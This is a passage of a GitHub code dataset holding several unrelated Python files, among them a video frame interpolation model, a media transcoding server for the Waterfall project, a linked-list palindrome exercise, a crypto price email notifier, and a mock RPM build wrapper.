kernels[:, :, :, :kernel_size*kernel_size]\n kernel2 = kernels[:, :, :, kernel_size*kernel_size:]\n\n '''\n Warp Context and Input Images\n '''\n warped_img1 = tf.reshape(adaptive_warp(first_img_t, flow_pred1 * t, kernel1), tf.shape(first_img_t))\n warped_img2 = tf.reshape(adaptive_warp(end_img_t, flow_pred2 * (1-t), kernel2), tf.shape(end_img_t))\n\n # warped_ctx1 = tf.reshape(adaptive_warp(ctx1, flow_pred1*t, kernel1), tf.shape(ctx1))\n # warped_ctx2 = tf.reshape(adaptive_warp(ctx2, flow_pred2*(1-t), kernel2), tf.shape(ctx2))\n\n '''\n Fuse the Warped Images\n '''\n # res_img = synthesis_net(tf.concat([warped_img1, warped_ctx1, warped_img2, warped_ctx2], axis=-1), training=training, trainable=trainable, out_size=3, reuse=reuse)\n res_img = warped_img1 * mask + warped_img2 * (1.0 - mask)\n return res_img\n\nif __name__ == '__main__':\n pass","repo_name":"sunyasheng/video-frame-interpolation","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4891665439","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 29 11:57:30 2014\n\n@author: arbeit\n\"\"\"\n\nfrom __future__ import division, print_function, absolute_import\nfrom numpy import exp, log, sqrt\nfrom scipy.misc import logsumexp\nimport numpy as np\nfrom copy import copy\nimport scipy.stats as stats\nimport cPickle as pickle\n\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\n\ndef plot_var_bias_mse(res, num_evid_samp, title, num_post_samples, num_imp_samples, dims, logarithmic = True, outfname = \"plot.pdf\"):\n ssize = sorted(res.keys())\n st = res[ssize[0]].keys()\n st_abs = []\n st_rel = []\n for s in st:\n if s.endswith(\"(relat)\"):\n st_rel.append(s)\n else:\n st_abs.append(s)\n st_abs.sort()\n st_rel.sort()\n st = copy(st_abs)\n st.extend(st_rel)\n estimators = res[ssize[0]][st[0]].keys()\n fig, axes = plt.subplots(ncols=max(len(st_abs), len(st_rel)), nrows = 2)\n \n some_val = res.values()[0]\n \n for i in range(len(st)):\n m = st[i]\n a = axes.flat[i]\n for e in estimators:\n if logarithmic:\n prestr = \"log \"\n else:\n prestr = \"\"\n x = num_evid_samp\n y = some_val[m][e] #np.array([res[i][m][e] for i in x]).flatten()\n a.plot(x, y, label=e)\n a.set_title(\"$\"+m+\"$\")\n a.set_xlabel(prestr + \"# imp samp\")\n a.set_ylabel(prestr + \"$\"+m+\"$\")\n a.autoscale(\"both\")\n a.set_aspect(\"auto\", adjustable=\"datalim\")\n lgd = axes[0,-1].legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n fig.suptitle(title + \"; dim=\" + str(dims)+\", \"\n + str(num_post_samples) + \" MCMC Samples, \"\n + str(num_imp_samples) + \" Importance Samples\")\n \n fig.tight_layout()\n fig.savefig(outfname, bbox_extra_artists=(lgd,), bbox_inches='tight')\n plt.close(fig)\n \n \n ","repo_name":"ingmarschuster/ModelSelection","sub_path":"modsel/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32537134381","text":"import RavenManager\nimport psutil\nimport platform \nfrom PIL import Image\nfrom colorthief import ColorThief\nimport hashlib \nimport datetime\nimport random\nimport asyncio\nimport ffmpeg\nimport os\nfrom werkzeug.utils import secure_filename\nimport psycopg2 \nimport json\nimport psutil\nimport pyvidia\nimport time\nfrom multiprocessing import Pool \nfrom shutil import copyfile\n\nclass Content(RavenManager.Raven):\n def 
__init__(self, config):\n # Make folders. \n self.baseDir = config['SERVER']['baseDir']\n if not os.path.exists('tmp'):\n os.makedirs('tmp')\n if not os.path.exists(self.baseDir + 'images'):\n os.makedirs(self.baseDir + 'images')\n if not os.path.exists(self.baseDir + 'audio'):\n os.makedirs(self.baseDir + 'audio')\n if not os.path.exists(self.baseDir + 'videos'):\n os.makedirs(self.baseDir + 'videos')\n if not os.path.exists(self.baseDir + 'avatars'):\n os.makedirs(self.baseDir + 'avatars')\n self.config = config\n self.type = 'content'\n self.fast_storage = None\n self.cpu_count = psutil.cpu_count()\n self.max_transcodes = int(self.cpu_count / 4) - 1\n self.transcode_threads = 4\n if any(platform.win32_ver()):\n disk = psutil.disk_usage('C:')\n else:\n disk = psutil.disk_usage(self.baseDir)\n self.freeDisk = disk.free / 1024 # Should be KB, in theory\n self.transcodingCount = 0\n self.acceptingwork = 0\n self.prepare()\n self.sqlUserName = self.config['DATABASE']['username']\n self.sqlHost = self.config['DATABASE']['hostname']\n self.sqlPassword = self.config['DATABASE']['password']\n self.sqlDatabaseName = self.config['DATABASE']['database']\n self.connection = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n self.cursor = self.connection.cursor()\n self.failedList = []\n if self.cursor.connection:\n self.connectionWorks = True\n else:\n self.connectionWorks = False\n print(\"Connection failed. Exiting.\")\n exit(0)\n \n\n def __del__(self):\n print('Destroying content node.')\n self.cursor.close()\n self.connection.close()\n\n def updateFreeDiskSpace(self):\n if any(platform.win32_ver()):\n disk = psutil.disk_usage('C:')\n else:\n disk = psutil.disk_usage(self.baseDir)\n self.freeDisk = disk.free / 1024\n self.totalDisk = disk.total / 1024\n sql = \"UPDATE raven_servers SET storage_available = %s, storage_total = %s WHERE id = %s\"\n self.cursor.execute(sql, (self.freeDisk, self.totalDisk, self.config['SERVER']['serverID']))\n\n\n #####################################################\n ################### IMAGES ##########################\n #####################################################\n\n\n def getColourPalette(self, path):\n \"\"\"\n Gets a list of the four most dominant colours in the image.\n \"\"\"\n image = ColorThief(path)\n try:\n image = ColorThief(path)\n palette = image.get_palette(color_count=4)\n del image\n return palette\n except:\n del image\n return [[0,0,0], [255,0,0], [0,255,0], [0,0,255]]\n\n def getDiskStatus(self):\n if any(platform.win32_ver()):\n disk = psutil.disk_usage('C:')\n else:\n disk = psutil.disk_usage('/')\n status = {'total': disk.total, 'used': disk.used, 'free': disk.free, 'percent': disk.percent}\n return status\n \n # Processes an image. If it's a GIF, just stores the GIF as is, because Pillow doesn't really\n # have a good way to process GIFs, and when using the seek() method, frames routinely got heavily\n # artifacted. 
After spending a few weeks on it, I gave up and decided to just store GIFs as is.\n def processImage(self, size, imFile, isAvatar, imgData, baseDir, directory, datehash):\n image = Image.open(imFile)\n imgDat = {}\n imgDat['url'] = {}\n thisTime = time.time()\n if image.format == 'GIF' or image.format == 'gif':\n resTime = time.time()\n # allFrames = self.extractAndResizeFrames(imFile, size)\n imgDat['resize'] = (time.time() - resTime)\n retName = 'images/%s/waterfall_%s_%s.gif' % (directory, datehash, size[0])\n thumbName = baseDir + retName\n copyfile(imFile, thumbName)\n image.close()\n\n \n imgDat['url']['legacy'] = retName\n imgDat['url']['modern'] = retName\n with open(thumbName, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n imgDat['md5'] = m.hexdigest()\n imgDat['md5p'] = m.hexdigest()\n fh.close()\n \n else:\n resTime = time.time()\n if image.mode== 'CMYK' and image.mode != 'RGBA':\n image = image.convert('RGBA')\n image.thumbnail(size)\n\n imgDat['resize'] = (time.time() - resTime)\n retName = 'images/%s/waterfall_%s_%s.webp' % (directory, datehash, size[0])\n thumbName = baseDir + retName\n image.save(thumbName, quality=100)\n retNameP = 'images/%s/waterfall_%s_%s.png' % (directory, datehash, size[0])\n thumbNameP = baseDir + retNameP\n image.save(thumbNameP, quality=100)\n\n image.close()\n\n imgDat['url']['legacy'] = retNameP\n imgDat['url']['modern'] = retName\n\n with open(thumbName, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n imgDat['md5'] = m.hexdigest()\n fh.close()\n\n with open(thumbNameP, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n imgDat['md5p'] = m.hexdigest()\n fh.close()\n \n retSize = size[0] \n \n imgDat['time'] = (time.time() - thisTime)\n imgData[int(retSize)] = imgDat\n\n def prepare(self):\n try:\n if pyvidia.get_nvidia_device() is None:\n self.hasGPU = 0\n print(\"No GPU found\")\n else:\n self.hasGPU = 1\n print(\"GPU found\")\n except:\n self.hasGPU = 0\n print(\"Not on Linux, skipping GPU check\")\n self.hasGPU = 0\n self.acceptingWork = 1 \n\n def startDraining(self):\n self.acceptingWork = 0\n\n def stopDraining(self):\n self.acceptingWork = 1\n\n def getStatus(self):\n data = {}\n data['acceptingWork'] = self.acceptingWork\n data['transcodingCount'] = self.transcodingCount\n data['failedList'] = self.failedList \n return data\n\n\n #####################################################\n ################### VIDEOS ##########################\n #####################################################\n \n # Marks a video as in progress in the database. This is done as a separate thing, since during high periods of load, there can be\n # a wait. For example, on a system with four threads, only one video would process at a time - so the second, third, etc. that try to transcode \n # simultaneously have to wait until there's enough free cores. 
\n def markVideoInProgress(self, videoID):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n if linkCursor.connection:\n pass\n else:\n self.failedList.append(videoID)\n return\n try:\n sql = \"UPDATE video SET servers = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', 'in_progress', videoID))\n link.commit()\n linkCursor.close()\n link.close()\n except:\n pass \n # We can probably get away with it...\n self.transcodingCount = self.transcodingCount + 1\n\n # Marks a video as failed in the database.\n def markVideoFailed(self, videoID, tempFile):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n if linkCursor.connection:\n pass\n else:\n self.failedList.append(videoID)\n return\n try:\n sql = \"UPDATE video SET servers = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', 'failed', videoID))\n link.commit()\n linkCursor.close()\n link.close()\n except:\n self.failedList.append(videoID)\n finally:\n self.transcodingCount = self.transcodingCount - 1\n os.remove('tmp/' + tempFile)\n\n # Retrieves info on bitrate, dimensions, etc. \n def probeVideo(self, tempFile):\n try:\n probe = ffmpeg.probe('tmp/' + tempFile)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n audio_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'audio'), None)\n if audio_stream is not None:\n audio_present = True\n else:\n audio_present = False\n width = (int(video_stream['width']) / 2)\n height = (int(video_stream['height']) /2)\n try: \n bitrate = int(video_stream['bit_rate'])\n except:\n bitrate = 3000\n data = {}\n data['video_stream'] = video_stream \n data['audio_stream'] = audio_stream \n data['audio_present'] = audio_present\n data['width'] = width \n data['height'] = height \n data['bitrate'] = bitrate\n # Maybe something can go here in future to filter out unsuitable qualities. 
\n return data\n except ffmpeg.Error:\n return False\n\n def getScaleData(self, data, quality):\n baseWidth = data['width']\n baseHeight = data['height']\n baseBitrate = data['bitrate']\n width = baseWidth\n height = baseHeight\n bitrate = baseBitrate\n\n crf = 14\n if quality == 'sq':\n if width > 720:\n multiplier = baseWidth / 720\n height = int(height / multiplier)\n width = 720\n bitrate = int(baseBitrate / 1.5)\n crf = 17\n if bitrate > 5000:\n bitrate = 5000\n elif quality == 'lq':\n if width > 480:\n multiplier = baseWidth / 480\n height = int(height / multiplier)\n width = 480\n bitrate = int(baseBitrate / 2.25)\n crf = 23\n if bitrate > 2500:\n bitrate = 2500\n if (width % 2) != 0:\n width = width + 1\n if (height % 2) != 0:\n height = height + 1\n if bitrate > 10000:\n bitrate = 10000\n data = {}\n data['width'] = width\n data['height'] = height \n data['bitrate'] = bitrate \n data['crf'] = crf \n return data\n\n def resetTranscodeCount(self):\n self.transcodingCount = 0\n\n def processTranscode(self, tempFile, scaleData, outName, videoInfo):\n audioPresent = videoInfo['audio_present']\n bufSize = scaleData['bitrate'] * 2\n if audioPresent == True:\n inputFile = ffmpeg.input('tmp/' + tempFile)\n videoStream = inputFile.video #.filter('scale', scaleData['width'], scaleData['height'])\n audioStream = inputFile.audio \n joined = ffmpeg.concat(videoStream, audioStream, v=1, a=1).node\n video = joined[0]\n audio = joined[1]\n try:\n ffmpeg.output(video, audio, outName, crf=scaleData['crf'], threads=self.transcode_threads, pix_fmt='yuv420p', acodec='aac', vcodec='libx264', preset=\"veryfast\").run(capture_stdout=True)\n return True\n except ffmpeg.Error as e:\n print(e.stderr)\n return False\n else: \n inputFile = ffmpeg.input('tmp/' + tempFile)\n videoStream = inputFile.video #.filter('scale', scaleData['width'], scaleData['height'])\n joined = ffmpeg.concat(videoStream, v=1).node\n video = joined[0]\n try:\n ffmpeg.output(video, outName, crf=scaleData['crf'], threads=self.transcode_threads, pix_fmt='yuv420p', acodec='aac', vcodec='libx264', preset=\"veryfast\").run(capture_stdout=True)\n return True\n except ffmpeg.Error as e:\n return False\n\n def transcodeVideo(self, tempFile, videoID, skipUpdate, postType):\n print(videoID)\n while self.transcodingCount >= self.max_transcodes:\n time.sleep(random.randint(15,30))\n self.markVideoInProgress(videoID)\n date = datetime.datetime.now()\n datehash = hashlib.md5(str(date).encode('utf-8')).hexdigest()\n dirwithint = datehash + str(random.randrange(1, 999999))\n directory = hashlib.md5(str(dirwithint).encode('utf-8')).hexdigest()\n os.mkdir(self.baseDir + 'videos/' + directory) \n try:\n videoInfo = self.probeVideo(tempFile)\n except:\n self.markVideoFailed(videoID, tempFile)\n return\n qualityList = ['lq', 'sq', 'hq'] # We'll do them in this order.\n pathList = {}\n for quality in qualityList:\n if quality == 'sq':\n qualityStr = ''\n else:\n qualityStr = '_' + quality\n returnName = 'videos/%s/waterfall_%s%s.mp4'% (directory, datehash, qualityStr)\n outName = self.baseDir + returnName\n try:\n scaleData = self.getScaleData(videoInfo, quality)\n size = scaleData['height']\n except:\n continue\n processed = self.processTranscode(tempFile, scaleData, outName, videoInfo)\n if processed == True:\n pathList[quality] = {}\n with open(outName, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n pathList[quality]['md5'] = m.hexdigest()\n pathList[quality]['path'] = returnName\n 
pathList[quality]['size'] = size\n else: \n pass\n if len(pathList) == 0:\n self.markVideoFailed(videoID, tempFile)\n return\n else:\n self.markVideoComplete(tempFile, videoID, pathList, skipUpdate, postType)\n return\n\n def markVideoComplete(self, tempFile, videoID, pathList, skipUpdate, postType):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n print('Post Type ' + postType)\n if linkCursor.connection:\n pass\n else:\n self.failedList.append(videoID)\n return\n try:\n sql = \"UPDATE video SET servers = %s, paths = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', json.dumps(pathList), 'complete', videoID))\n link.commit()\n if skipUpdate is False:\n print(\"Not skipping post update\")\n print(videoID)\n sql = \"UPDATE posts SET post_status = %s, timestamp = %s WHERE video_id = %s\"\n linkCursor.execute(sql, ('posted', datetime.datetime.utcnow(), videoID))\n link.commit()\n for video in list(self.failedList):\n sql = \"UPDATE video SET servers = %s, paths = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', '{}', 'failed', video))\n link.commit()\n self.failedList.remove(video)\n\n linkCursor.close()\n link.close()\n except:\n return\n finally:\n self.transcodingCount = self.transcodingCount - 1\n os.remove('tmp/' + tempFile)\n\n def markAudioComplete(self, audioID, path, md5):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n if linkCursor.connection:\n pass\n else:\n return\n try:\n sql = \"UPDATE audio SET servers = %s, paths = %s, md5 = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', '\"' +path +'\"', md5, audioID))\n sql = \"UPDATE posts SET post_status = %s, timestamp = %s WHERE audio_id = %s\"\n linkCursor.execute(sql, ('posted', datetime.datetime.utcnow(), audioID))\n link.commit()\n except:\n return\n finally:\n linkCursor.close()\n link.close()","repo_name":"MasterSteelblade/Waterfall","sub_path":"raven/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":17974,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"99"} +{"seq_id":"8993385539","text":"\"\"\"\n给定一个单链表的头节点head,请判断该链表是否为回文结构\n\"\"\"\n\n\nclass Node(object):\n value: int = 0\n next = None\n\n def __init__(self, value):\n self.value = value\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __str__(self):\n return f'Node value: {self.value}'\n\n\ndef is_palindrome1(head: Node) -> bool:\n \"\"\"\n 使用栈实现,需要额外的空间复杂度N\n \"\"\"\n cur = head\n stack = []\n while cur:\n stack.insert(0, cur)\n cur = cur.next\n\n while head:\n if head != stack.pop(0):\n return False\n head = head.next\n return True\n\n\ndef is_palindrome2(head: Node) -> bool:\n \"\"\"\n 使用栈实现,找到队列的上中点,将下半部分所有链表压入栈中,需要额外的空间复杂度N/2\n \"\"\"\n if head is None or head.next is None:\n return True\n if head.next.next is None:\n return head.value == head.next.value\n\n # 求中点位置\n slow = head.next\n fast = head.next.next\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n\n stack = []\n # 慢指针现在在中点或者上中点位置\n cur = slow.next\n while cur:\n stack.insert(0, cur)\n cur = cur.next\n # 判断栈中和链表是否相等\n cur = head\n while stack:\n if stack.pop(0) != cur:\n return False\n cur = 
cur.next\n return True\n\n\ndef is_palindrome3(head: Node) -> bool:\n \"\"\"\n 使用栈实现,找到队列的上中点,反转下半部分链表,不使用额外的空间复杂度\n \"\"\"\n if head is None or head.next is None:\n return True\n # 求中点位置\n slow = head\n fast = head\n while fast.next and fast.next.next:\n slow = slow.next # mid\n fast = fast.next.next # end\n mid = slow\n\n # 反转下半部分链表\n pre = None\n cur = mid.next\n mid.next = None\n while cur:\n next_node = cur.next\n cur.next = pre\n pre = cur\n cur = next_node\n end = pre\n\n # 判断链表是否一致\n flag = True\n start = head\n last = end\n while start and end:\n if start.value != end.value:\n flag = False\n break\n start = start.next\n end = end.next\n\n # 还原原链表\n pre = None\n cur = last\n while cur:\n next_node = cur.next\n cur.next = pre\n pre = cur\n cur = next_node\n mid.next = pre\n return flag\n\n\ndef print_nodes(head: Node):\n while head:\n print(head.value, end=',')\n head = head.next\n print()\n\n\ndef build_nodes(word):\n head = cur = None\n for w in word:\n if head is None:\n head = Node(w)\n cur = head\n else:\n cur.next = Node(w)\n cur = cur.next\n return head\n\n\ndef main():\n head = build_nodes('12321')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is True\n\n head = build_nodes('1')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is True\n\n head = build_nodes('12')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is False\n\n head = build_nodes('1221')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is True, (res1, res2, res3)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pql-eternally/algorithm","sub_path":"classes/Class_09/Code02_IsPalindromeList.py","file_name":"Code02_IsPalindromeList.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21710174922","text":"# -*-coding:utf-8-*-\nimport smtplib\nimport logging\n\nfrom common import constants, config\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\n\nclass MailSender:\n def __init__(self, data: list, price: float, to_addr: str):\n self.data = data\n self.price = price\n self.to_addr = to_addr\n\n def __send(self, last_price):\n params = config.read_config()\n server = params[config.TAG_SMTP_SERVER]\n server = smtplib.SMTP(server)\n server.ehlo()\n server.starttls()\n from_addr = params[config.TAG_FROM_ADDR]\n password = params[config.TAG_PASSWORD]\n server.login(from_addr, password)\n\n msg_str = 'Hi there\\nThe price of ' + self.data[constants.TAG_INST_ID] + ' is '\n if last_price > self.price * 1.1:\n msg_str += 'above 10% of '\n code = constants.ABOVE_TEN_PERCENT\n elif self.price * 1.05 < last_price <= self.price * 1.1:\n msg_str += 'above 5% of '\n code = constants.ABOVE_FIVE_PERCENT\n elif self.price < last_price <= self.price * 1.05:\n msg_str += 'above '\n code = constants.ABOVE\n elif self.price * 0.95 <= last_price < self.price:\n msg_str += 'below '\n code = constants.BELOW\n elif self.price * 0.9 <= last_price < self.price * 0.95:\n msg_str += 'below 5% of '\n code = 
constants.BELOW_FIVE_PERCENT\n elif last_price < self.price * 0.9:\n msg_str += 'below 10% of '\n code = constants.BELOW_TEN_PERCENT\n else:\n msg_str += 'equal '\n code = constants.EQUAL\n msg_str += str(self.price)\n msg_str += '\\n'\n\n msg_str += 'The price now is ' + str(last_price)\n msg = MIMEText(msg_str, 'plain', 'utf-8')\n msg['Subject'] = Header('Coin tracker notify...', 'utf-8').encode()\n server.sendmail(from_addr, [self.to_addr], msg.as_string())\n logger.info('%s start sending email...' % from_addr)\n return code\n\n def do(self, check):\n last_price = float(self.data[constants.TAG_LAST_PRICE])\n if check == constants.ABOVE_TEN_PERCENT and last_price > self.price * 1.1:\n return constants.ABOVE_TEN_PERCENT\n if check == constants.ABOVE_FIVE_PERCENT and (self.price * 1.05 < last_price <= self.price * 1.1):\n return constants.ABOVE_FIVE_PERCENT\n if check == constants.ABOVE and (self.price < last_price <= self.price * 1.05):\n return constants.ABOVE\n if check == constants.EQUAL and self.price == last_price:\n return constants.EQUAL\n if check == constants.BELOW and (self.price * 0.95 <= last_price < self.price):\n return constants.BELOW\n if check == constants.BELOW_FIVE_PERCENT and (self.price * 0.9 <= last_price < self.price * 0.95):\n return constants.BELOW_FIVE_PERCENT\n if check == constants.BELOW_TEN_PERCENT and last_price < self.price * 0.9:\n return constants.BELOW_TEN_PERCENT\n\n return self.__send(last_price)\n","repo_name":"allen1989127/coin-checker","sub_path":"action/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20011813839","text":"import json\nfrom difflib import get_close_matches\ndata = json.load(open(\"C:\\\\Users\\\\ssubh\\\\OneDrive\\\\Desktop\\\\python\\\\Basic\\\\data.json\"))\n\ndef define_wrd(w):\n if w in data:\n return data[w]\n elif len(get_close_matches(w, data.keys())) > 0:\n yn = input(\"Did you mean %s instead?(Enter y/n): \" % get_close_matches(w, data.keys())[0])\n if yn == \"y\":\n return get_close_matches(w, data.keys())[0]\n elif yn == \"n\":\n return \"the word you entered does not exist, double check it\"\n \n else:\n return \"We did not understand what you entered.\"\n \n \n else:\n return \"Im sorry that word does not seem to be in the dictionary.\"\n\nword = input(\"What word do you need defined?: \")\n\noutput = define_wrd(word)\n\nif type(output) == list:\n for item in output:\n print(item)\n","repo_name":"Sandkelp/pythonStart","sub_path":"Basic/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34779663667","text":"import os\nimport json\nimport shutil\nimport subprocess\nfrom integration.build import shell\nfrom integration.build.api import env\nfrom integration.common import log\n\n# mock_cfg = '/etc/mock/starlingx.cfg'\n\n# all of the variables below are substituted by the build system\n__VERSION__ = \"1.4.21\"\nPYTHONDIR = \"/usr/lib/python3.6/site-packages\"\nPKGPYTHONDIR = \"/usr/lib/python3.6/site-packages/mockbuild\"\nMOCKCONFDIR = '/etc/mock'\n\nMAX_MEM_PER_WORKER = 11\nMIN_MEM_PER_WORKER = 3\n\n# end build system subs\nconfig_opts = None\n\n\ndef init_config_opts():\n global config_opts\n if not config_opts:\n import mockbuild.util\n root_cfg = os.path.join(MOCKCONFDIR, '%s.cfg' % os.environ.get('SYSTEM'))\n config_opts = 
mockbuild.util.load_config(MOCKCONFDIR, root_cfg, None, __VERSION__, PKGPYTHONDIR)\n\n\nclass Mock(object):\n\n def __init__(self, index, workdir=None, local_repo=None, **kwargs):\n init_config_opts()\n self.config_opts = config_opts\n self.index = index\n self.workdir = workdir\n if local_repo:\n self.add_local_repo(local_repo)\n if self.workdir:\n self.set_mock_env(self.workdir)\n self.config_dir = os.path.join(self.workdir, 'configs')\n if not os.path.exists(self.config_dir):\n os.makedirs(self.config_dir, mode=0o755)\n self.config_file = os.path.join(self.config_dir, '%s.b%d.cfg' % (os.environ.get('USER'), self.index))\n self.create_mock_conf_file()\n # log.info(json.dumps(self.__dict__, indent=4))\n\n def add_local_repo(self, local_repo_dir):\n localyumrepo = \"\"\"\n[%s]\nname=%s\nbaseurl=%s\nenabled=1\nskip_if_unavailable=1\nmetadata_expire=0\ncost=1\nbest=1\n\"\"\" % ('local_build_repo', 'local_build_repo', \"file://%s\" % local_repo_dir)\n self.config_opts['yum.conf'] += localyumrepo\n\n def set_mock_env(self, basedir):\n self.config_opts['basedir'] = basedir\n self.config_opts['resultdir'] = '{0}/result'.format(basedir)\n self.config_opts['backup_base_dir'] = '{0}/backup'.format(basedir)\n self.config_opts['root'] = 'mock/b{0}'.format(self.index)\n self.config_opts['cache_topdir'] = '{0}/cache/b{1}'.format(basedir, self.index)\n self.config_opts['macros']['%_tis_dist'] = '.%s' % env.postfix\n self.config_opts['macros']['%_tis_build_type'] = env.type\n if self.index > 0:\n self.config_opts['plugin_conf']['tmpfs_enable'] = True\n self.config_opts['plugin_conf']['tmpfs_opts'] = {}\n self.config_opts['plugin_conf']['tmpfs_opts']['required_ram_mb'] = 1024\n self.config_opts['plugin_conf']['tmpfs_opts']['max_fs_size'] = \"%dg\" % MAX_MEM_PER_WORKER\n self.config_opts['plugin_conf']['tmpfs_opts']['mode'] = '0755'\n self.config_opts['plugin_conf']['tmpfs_opts']['keep_mounted'] = True\n if not os.path.isdir(self.config_opts['cache_topdir']):\n os.makedirs(self.config_opts['cache_topdir'], exist_ok=True)\n cache_dir = \"%s/%s/mock\" % (self.config_opts['basedir'], self.config_opts['root'])\n if not os.path.isdir(cache_dir):\n os.makedirs(cache_dir)\n\n def create_mock_conf_file(self):\n with open(self.config_file, 'w') as br_dest:\n for k, v in list(self.config_opts.items()):\n br_dest.write(\"config_opts[%r] = %r\\n\" % (k, v))\n with open(self.config_file) as f:\n code = compile(f.read(), self.config_file, 'exec')\n # pylint: disable=exec-used\n exec(code)\n\n # these files needed from the mock.config dir to make mock run\n for fn in ['site-defaults.cfg', 'logging.ini']:\n pth = os.path.join(self.config_dir, fn)\n src = os.path.join(MOCKCONFDIR, fn)\n if os.path.exists(src) and not os.path.exists(pth):\n shutil.copyfile(src, pth)\n\n def execute(self, srpm_file, result_dir=None, defines=None):\n cmd = ['/usr/bin/mock',\n '--configdir', self.config_dir,\n '-r', self.config_file,\n '--no-clean',\n '--no-cleanup-after',\n '--rebuild']\n if result_dir:\n cmd.extend(['--resultdir', result_dir])\n if defines:\n for k, v in defines.items():\n cmd.extend(['--define', \"%s %s\" % (k, v)])\n cmd.append(srpm_file)\n return shell.popen_communicate(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n\n\n\n\n","repo_name":"zhangkunpeng/integration","sub_path":"build/centos/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24669037737","text":"import argparse\nimport 
os\nimport os.path as osp\n\nimport boxlib\nimport numpy as np\nimport posepile.datasets3d as ds3d\nimport simplepyutils as spu\nfrom posepile.util.adaptive_pose_sampling import AdaptivePoseSampler2\nfrom posepile.ds.experimental.cwi.main import temporal_median\nfrom posepile.ds.experimental.vcliti.save_camconfig import load_camera\nfrom posepile.paths import DATA_ROOT\nfrom posepile.util.preproc_for_efficiency import make_efficient_example\nfrom posepile.util import geom3d\nfrom simplepyutils import FLAGS\n\nVCLITI_ROOT = f'{DATA_ROOT}/vcliti'\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--stage', type=int)\n spu.initialize(parser)\n\n if FLAGS.stage == 1:\n make_stage1()\n elif FLAGS.stage == 2:\n make_dataset()\n\n\ndef make_stage1():\n i_task = int(os.environ['SLURM_ARRAY_TASK_ID'])\n out_path = f'{DATA_ROOT}/vcliti_downscaled/tasks/task_result_{i_task:03d}.pkl'\n # if osp.exists(out_path):\n # return\n\n joint_info_base = spu.load_pickle(\n f'{DATA_ROOT}/skeleton_conversion/joint_info_122.pkl')\n i_selected_joints = [\n i for i, name in enumerate(joint_info_base.names)\n if any(name.endswith(x) for x in ['_cmu_panoptic', '_coco']) or '_' not in name]\n joint_info = joint_info_base.select_joints(i_selected_joints)\n joint_info.update_names([x.replace('cmu_panoptic', 'coco') for x in joint_info.names])\n ref_bone_len = np.array(\n spu.load_pickle(f'{DATA_ROOT}/ntu/predictor_bone_length_prior.pkl'), np.float32)\n\n triang_paths_all = 